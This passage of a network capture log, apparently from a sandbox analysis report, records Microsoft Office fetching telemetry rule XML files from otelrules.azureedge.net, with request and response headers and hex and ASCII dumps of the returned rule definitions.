                                                                                                                                      2024-10-07 01:23:10 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      82192.168.2.44982013.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:10 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:10 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:10 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 3342
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                                                                      ETag: "0x8DC582B927E47E9"
                                                                                                                                      x-ms-request-id: 960edd56-701e-005c-4100-17bb94000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012310Z-1657d5bbd48f7nlxc7n5fnfzh000000002eg000000009uhw
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:10 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      83192.168.2.44982213.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:11 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:11 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:11 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1393
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                                                                      ETag: "0x8DC582BE3E55B6E"
                                                                                                                                      x-ms-request-id: 8a5fd43d-c01e-0066-4506-17a1ec000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012311Z-1657d5bbd48vlsxxpe15ac3q7n00000002qg00000000hz5v
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:11 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      84192.168.2.44982113.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:11 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:11 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:11 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 2284
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                                                                      ETag: "0x8DC582BCD58BEEE"
                                                                                                                                      x-ms-request-id: b738acd5-401e-0067-1502-1709c2000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012311Z-1657d5bbd487nf59mzf5b3gk8n00000002ag00000000ryw0
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:11 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      85192.168.2.44982313.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:11 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:11 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:11 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1356
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                      ETag: "0x8DC582BDC681E17"
                                                                                                                                      x-ms-request-id: 0480ed94-801e-00ac-5102-17fd65000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012311Z-1657d5bbd48tnj6wmberkg2xy800000002x00000000097b8
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:11 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      86192.168.2.44982413.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:11 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:11 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:11 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1393
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                                                                      ETag: "0x8DC582BE39DFC9B"
                                                                                                                                      x-ms-request-id: b72ef555-401e-0067-78fe-1609c2000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012311Z-1657d5bbd48wd55zet5pcra0cg00000002rg00000000epbn
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:11 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      87192.168.2.44982513.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:11 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:11 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:11 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1356
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                      ETag: "0x8DC582BDF66E42D"
                                                                                                                                      x-ms-request-id: db28c537-d01e-0065-47fe-16b77a000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012311Z-1657d5bbd482lxwq1dp2t1zwkc00000002gg00000000g2mh
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:11 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      88192.168.2.44982813.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:11 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:12 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:11 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1395
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                      ETag: "0x8DC582BDE12A98D"
                                                                                                                                      x-ms-request-id: b6c21a8e-c01e-008e-115a-177381000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012311Z-1657d5bbd48762wn1qw4s5sd3000000002p000000000cwfw
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:12 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      89192.168.2.44982613.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:11 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:12 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:11 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1395
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                      ETag: "0x8DC582BE017CAD3"
                                                                                                                                      x-ms-request-id: cb759915-201e-003f-5f03-176d94000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012311Z-1657d5bbd48vhs7r2p1ky7cs5w000000031g00000000mvct
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:12 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      90192.168.2.44982713.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:11 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:12 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:11 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1358
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                      ETag: "0x8DC582BE6431446"
                                                                                                                                      x-ms-request-id: 84e7aa3f-c01e-008e-74ff-167381000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012311Z-1657d5bbd48t66tjar5xuq22r800000002ug00000000533w
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:12 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      91192.168.2.44983013.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:12 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
